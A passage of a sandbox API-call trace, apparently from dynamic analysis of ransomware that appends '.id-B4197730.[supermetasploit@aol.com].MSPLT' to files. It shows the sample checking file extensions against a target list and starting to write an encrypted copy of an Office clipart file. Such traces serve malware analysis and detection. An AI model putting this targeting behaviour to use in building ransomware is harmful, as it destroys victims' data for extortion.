shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.920] lstrlenW (lpString=".doc") returned 4 [0287.920] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.920] lstrlenW (lpString=".docx") returned 5 [0287.920] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0287.920] lstrlenW (lpString=".pdf") returned 4 [0287.920] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.920] lstrlenW (lpString=".xls") returned 4 [0287.920] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.920] lstrlenW (lpString=".xlsx") returned 5 [0287.920] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0287.920] lstrlenW (lpString=".ppt") returned 4 [0287.920] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.920] lstrlenW (lpString=".zip") returned 4 [0287.920] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.920] lstrlenW (lpString=".rar") returned 4 [0287.920] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.920] lstrlenW (lpString=".bz2") returned 4 [0287.921] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.921] lstrlenW (lpString=".7z") returned 3 [0287.921] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.921] lstrlenW (lpString=".dbf") returned 4 [0287.921] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.921] lstrlenW (lpString=".1cd") returned 4 [0287.921] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.921] lstrlenW (lpString=".jpg") returned 4 [0287.921] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.921] lstrlenW (lpString=".doc") returned 4 [0287.921] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.921] lstrlenW (lpString=".docx") returned 5 [0287.921] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0287.921] lstrlenW (lpString=".pdf") returned 4 [0287.921] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.921] lstrlenW (lpString=".xls") returned 4 [0287.921] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.921] lstrlenW (lpString=".xlsx") returned 5 [0287.921] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0287.921] lstrlenW (lpString=".ppt") returned 4 [0287.921] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.922] lstrlenW (lpString=".zip") returned 4 [0287.922] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.922] lstrlenW (lpString=".rar") returned 4 [0287.922] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.922] lstrlenW (lpString=".bz2") returned 4 [0287.922] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.922] lstrlenW (lpString=".7z") returned 3 [0287.922] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.922] lstrlenW (lpString=".dbf") returned 4 [0287.922] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.922] lstrlenW (lpString=".1cd") returned 4 [0287.922] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.922] lstrlenW (lpString=".jpg") returned 4 [0287.922] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.922] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.922] lstrlenW (lpString="ea.xml") returned 6 [0287.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.932] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=384) returned 1 [0287.933] CloseHandle (hObject=0x420) returned 1 [0287.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0287.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.933] lstrlenW (lpString=".doc") returned 4 [0287.933] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.933] lstrlenW (lpString=".docx") returned 5 [0287.933] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0287.933] lstrlenW (lpString=".pdf") returned 4 [0287.933] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.933] lstrlenW (lpString=".xls") returned 4 [0287.933] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.933] lstrlenW (lpString=".xlsx") returned 5 [0287.933] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0287.933] lstrlenW (lpString=".ppt") returned 4 [0287.933] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.934] lstrlenW (lpString=".zip") returned 4 [0287.934] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.934] lstrlenW (lpString=".rar") returned 4 [0287.934] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.934] lstrlenW (lpString=".bz2") returned 4 [0287.934] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.934] lstrlenW (lpString=".7z") returned 3 [0287.934] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.934] lstrlenW (lpString=".dbf") returned 4 [0287.934] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.934] lstrlenW (lpString=".1cd") returned 4 [0287.934] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.934] lstrlenW (lpString=".jpg") returned 4 [0287.934] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.934] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.934] lstrlenW (lpString=".doc") returned 4 [0287.934] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.934] lstrlenW (lpString=".docx") returned 5 [0287.934] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0287.934] lstrlenW (lpString=".pdf") returned 4 [0287.934] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.934] lstrlenW (lpString=".xls") returned 4 [0287.934] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.935] lstrlenW (lpString=".xlsx") returned 5 [0287.935] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0287.935] lstrlenW (lpString=".ppt") returned 4 [0287.935] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.935] lstrlenW (lpString=".zip") returned 4 [0287.935] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.935] lstrlenW (lpString=".rar") returned 4 [0287.935] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.935] lstrlenW (lpString=".bz2") returned 4 [0287.935] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.935] lstrlenW (lpString=".7z") returned 3 [0287.935] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.935] lstrlenW (lpString=".dbf") returned 4 [0287.935] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.935] lstrlenW (lpString=".1cd") returned 4 [0287.935] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0287.935] lstrlenW (lpString=".jpg") returned 4 [0287.935] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.935] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.936] lstrlenW (lpString="keypad.xml") returned 10 [0287.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.936] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=693) returned 1 [0287.936] CloseHandle (hObject=0x420) returned 1 [0287.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml")) returned 0x20 [0287.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.937] lstrlenW (lpString=".doc") returned 4 [0287.937] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.937] lstrlenW (lpString=".docx") returned 5 [0287.937] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0287.937] lstrlenW (lpString=".pdf") returned 4 [0287.937] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.937] lstrlenW (lpString=".xls") returned 4 [0287.937] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.937] lstrlenW (lpString=".xlsx") returned 5 [0287.937] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0287.937] lstrlenW (lpString=".ppt") returned 4 [0287.937] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.937] lstrlenW (lpString=".zip") returned 4 [0287.937] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.937] lstrlenW (lpString=".rar") returned 4 [0287.937] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.937] lstrlenW (lpString=".bz2") returned 4 [0287.937] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.937] lstrlenW (lpString=".7z") returned 3 [0287.937] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.937] lstrlenW (lpString=".dbf") returned 4 [0287.937] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.937] lstrlenW (lpString=".1cd") returned 4 [0287.937] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.937] lstrlenW (lpString=".jpg") returned 4 [0287.937] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.938] lstrlenW (lpString=".doc") returned 4 [0287.938] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.938] lstrlenW (lpString=".docx") returned 5 [0287.938] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0287.938] lstrlenW (lpString=".pdf") returned 4 [0287.938] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.938] lstrlenW (lpString=".xls") returned 4 [0287.938] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.938] lstrlenW (lpString=".xlsx") returned 5 [0287.938] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0287.938] lstrlenW (lpString=".ppt") returned 4 [0287.938] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.938] lstrlenW (lpString=".zip") returned 4 [0287.938] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.938] lstrlenW (lpString=".rar") returned 4 [0287.938] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.938] lstrlenW (lpString=".bz2") returned 4 [0287.938] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.938] lstrlenW (lpString=".7z") returned 3 [0287.938] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.938] lstrlenW (lpString=".dbf") returned 4 [0287.938] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.939] lstrlenW (lpString=".1cd") returned 4 [0287.939] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 75 [0287.939] lstrlenW (lpString=".jpg") returned 4 [0287.939] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.939] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.939] lstrlenW (lpString="base.xml") returned 8 [0287.939] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.940] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=3333) returned 1 [0287.940] CloseHandle (hObject=0x420) returned 1 [0287.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml")) returned 0x20 [0287.941] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.941] lstrlenW (lpString=".doc") returned 4 [0287.941] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.941] lstrlenW (lpString=".docx") returned 5 [0287.941] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0287.941] lstrlenW (lpString=".pdf") returned 4 [0287.941] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.941] lstrlenW (lpString=".xls") returned 4 [0287.941] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.941] lstrlenW (lpString=".xlsx") returned 5 [0287.941] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0287.941] lstrlenW (lpString=".ppt") returned 4 [0287.941] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.941] lstrlenW (lpString=".zip") returned 4 [0287.941] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.941] lstrlenW (lpString=".rar") returned 4 [0287.941] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.941] lstrlenW (lpString=".bz2") returned 4 [0287.942] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.942] lstrlenW (lpString=".7z") returned 3 [0287.942] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.942] lstrlenW (lpString=".dbf") returned 4 [0287.942] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.942] lstrlenW (lpString=".1cd") returned 4 [0287.942] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.942] lstrlenW (lpString=".jpg") returned 4 [0287.942] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.942] lstrlenW (lpString=".doc") returned 4 [0287.942] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.942] lstrlenW (lpString=".docx") returned 5 [0287.942] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0287.942] lstrlenW (lpString=".pdf") returned 4 [0287.942] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.942] lstrlenW (lpString=".xls") returned 4 [0287.942] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.942] lstrlenW (lpString=".xlsx") returned 5 [0287.942] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0287.942] lstrlenW (lpString=".ppt") returned 4 [0287.942] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.942] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.943] lstrlenW (lpString=".zip") returned 4 [0287.943] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.943] lstrlenW (lpString=".rar") returned 4 [0287.943] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.943] lstrlenW (lpString=".bz2") returned 4 [0287.943] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.943] lstrlenW (lpString=".7z") returned 3 [0287.943] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.943] lstrlenW (lpString=".dbf") returned 4 [0287.943] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.943] lstrlenW (lpString=".1cd") returned 4 [0287.943] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.943] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 78 [0287.943] lstrlenW (lpString=".jpg") returned 4 [0287.943] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.943] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.943] lstrlenW (lpString="baseAltGr_rtl.xml") returned 17 [0287.943] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.956] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=247) returned 1 [0287.956] CloseHandle (hObject=0x420) returned 1 [0287.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml")) returned 0x20 [0287.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.966] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0287.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0287.970] lstrlenW (lpString=".doc") returned 4 [0287.970] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.970] lstrlenW (lpString=".docx") returned 5 [0287.970] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0287.970] lstrlenW (lpString=".pdf") returned 4 [0287.970] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.970] lstrlenW (lpString=".xls") returned 4 [0287.970] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.970] lstrlenW (lpString=".xlsx") returned 5 [0287.970] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0287.970] lstrlenW (lpString=".ppt") returned 4 [0287.970] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0287.970] lstrlenW (lpString=".zip") returned 4 [0287.970] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.970] lstrlenW (lpString=".rar") returned 4 [0287.970] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.970] lstrlenW (lpString=".bz2") returned 4 [0287.970] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.970] lstrlenW (lpString=".7z") returned 3 [0287.970] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0289.644] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.644] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0289.646] GetLastError () returned 0x0 [0289.646] ReadFile (in: hFile=0x460, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: 